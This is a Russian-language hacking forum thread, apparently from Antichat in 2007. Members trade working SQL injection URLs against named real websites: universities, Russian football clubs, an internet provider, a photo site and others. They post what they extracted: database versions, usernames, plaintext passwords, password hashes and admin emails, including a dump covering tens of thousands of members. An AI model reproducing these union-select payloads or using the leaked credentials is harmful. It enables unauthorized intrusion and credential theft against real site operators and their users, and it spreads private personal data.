20.10.2007, 21:03
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами:
10153766
Репутация:
2565
|
|
edu
MySQL 4.x.x.
Код:
http://spacegrant.nmsu.edu/isps/page.php?num=-6'+union+select+1,2,user(),4,5/*
MySQL 3.x.x.
Код:
http://www.auburn.edu/oit/oitnews/article.php?num=57+/*!40000+and+0+*/
Последний раз редактировалось [53x]Shadow; 21.10.2007 в 15:08..
Причина: очепятка =\
|
|
|
21.10.2007, 14:33
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от [53x]Shadow
MySQL 3.x.x.
Код:
http://www.auburn.edu/oit/oitnews/article.php?num=57+/!*40000+and+0+*/
тогда уж так:
Код:
http://www.auburn.edu/oit/oitnews/article.php?num=57/*!40000+a'nd+0+*/
__________________
Карфаген должен быть разрушен...
|
|
|
|
21.10.2007, 16:27
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Код:
http://www.vive.gob.ve/programas.php?id_p=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71)/*
4.1.11-Debian_4sarge7-log
Код:
http://www.fitologica.it/indicazioni.php?id_p=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database()),9,10,11,12,13,14,15,16/*
fitologica_it@localhost:4.1.21:fitologica_it
Код:
http://www.undergroundkiteboards.com/detail_product.php?id_p=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6/*
undergro@202.191.42.50:4.0.27-standard-log:undergro
Код:
http://www.undergroundkiteboards.com/detail_product.php?id_p=-1+union+select+1,2,concat(login,0x3a,pwd),4,5,6+from+user+limit+0,1/*
dd:d adrian:bernie12 aaron:as7155as
Код:
http://www.brightstar-hid.com/product_info_e.php?UID=-1'+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
brightstar@localhost:5.0.22:brightstar_com_tw
Код:
http://voyag-lux.ru/chapter28.html?uid=-1+union+select+1,aes_decrypt(aes_encrypt(user,0x71),0x71),3,aes_decrypt(aes_encrypt(password,0x71),0x71),5,6,7+from+mysql.user/*
|
|
|
|
21.10.2007, 01:27
|
|
Познающий
Регистрация: 04.10.2007
Сообщений: 32
С нами:
9791439
Репутация:
88
|
|
ФК Химки
Код:
http://fckhimki.ru/modules/news/index.php?current_id=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
fckhimki_new1@v2.valuehost.ru
Версия 4.0.27-max-log
ФК Торпедо
Код:
http://www.torpedo.ru/gb/comments.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+news/*
Последний раз редактировалось -MoLoToK-; 21.10.2007 в 02:09..
|
|
|
|
21.10.2007, 12:30
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами:
9798146
Репутация:
1224
|
|
Интернет-провайдер в Тушино
http://tushino.com/?r=9999&id=-1'/**/union/**/select/**/0,1,2,3,4,5,6,user,8,9,password,11,12,13,14,15/**/from/**/mysql.user/*
root;396c55134cded03d
4.0.20-log |
|
|
|
21.10.2007, 14:03
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
fobo.ru
http://fobo.ru/member.php?action=getinfo&id=-1'+union+select+1,2,concat(version(),0x2F,database (),0x2F,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 ,51,52/*
5.0.45-Dotdeb_0.dotdeb.0-log/fobo/fobo@localhost
http://fobo.ru/member.php?action=getinfo&id=-1'+union+select+1,2,concat(username,0x2F,password, 0x2F,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52+from+user+limit+10000,1/*
имя\хеш\мейл 71530 участников )))
|
|
|
|
21.10.2007, 16:52
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
kazan.ws
http://kazan.ws/cgi-bin/republic/viewDG.pl?a=fa&id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6,7,8,9,10,11/*
4.0.26/kazan/postcards@192.168.1.15
http://kazan.ws/cgi-bin/republic/viewDG.pl?a=fa&id=-1+union+select+1,2,concat(name,0x2F,password),4,5, 6,7,8,9,10,11+from+users+limit+1,1/*
имя/пароль
123/123
|
|
|
|
21.10.2007, 18:00
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами:
9806786
Репутация:
869
|
|
website-security-software
Код:
https://www.website-security-software.com/portfolio-view.asp?cmd=view&ref=1%20and%201=convert(int,db_name())--
|
|
|
|
21.10.2007, 21:52
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
showcase.ru
http://www.showcase.ru/photo.php?photoid=-1+union+select+concat(version(),0x2F,database(),0x 2F,user()),2/*
5.0.45-log/u17392/u17392@10.10.10.208
http://www.showcase.ru/photo.php?photoid=-1+union+select+concat(admin,0x2F,admin_pw,0x2F,adm in_email)),2+from+phpads_config/*
admin/070d140eab0b74231c3a7fdaef1dea1b/troff@showcase.ru
Таблица phpbb_users
http://www.showcase.ru/photo.php?photoid=-1+union+select+concat(0x5B,username,0x2F,user_pass word,0x2F,user_icq,0x5D),2+from+phpbb_users/*
имя/хеш/уин
Таблица sziget_phpbb_users
http://www.showcase.ru/photo.php?photoid=-1+union+select+concat(0x5B,username,0x2F,user_pass word,0x2F,user_icq,0x5D),2+from+sziget_phpbb_users/*
имя/хеш/уин
Бывает, что если сразу грузить ссылку со скулей получеам чистый экран с надписью Oops!!! . Если же выполнять скулю поэтапно с ссылки-первоисточника то все работает
|
|
|
|
22.10.2007, 00:34
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Две интересные инъекции:
Код:
http://www.posarellivillas.com/it/testimonials.php?start_limit=0&length_limit=5&sort_type=DESC&sort_value=(select+if(ascii(substring(version(),1,1))=53,propertyid,city))
Код:
http://imoti.bulgaria-web-developers.com/property-for-sale.php?order=-id*(ascii(substring(version(),1,1))=53)+DESC&page_number=30&type=&location=
как видно везде 5-я версия мускула
кто первый скажет в чем прикол, поставлю ++
(репа должна быть меньше 100)
ответы мне в личку
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 22.10.2007 в 00:37..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?485949){kind=avatar}
Комбинированный вид
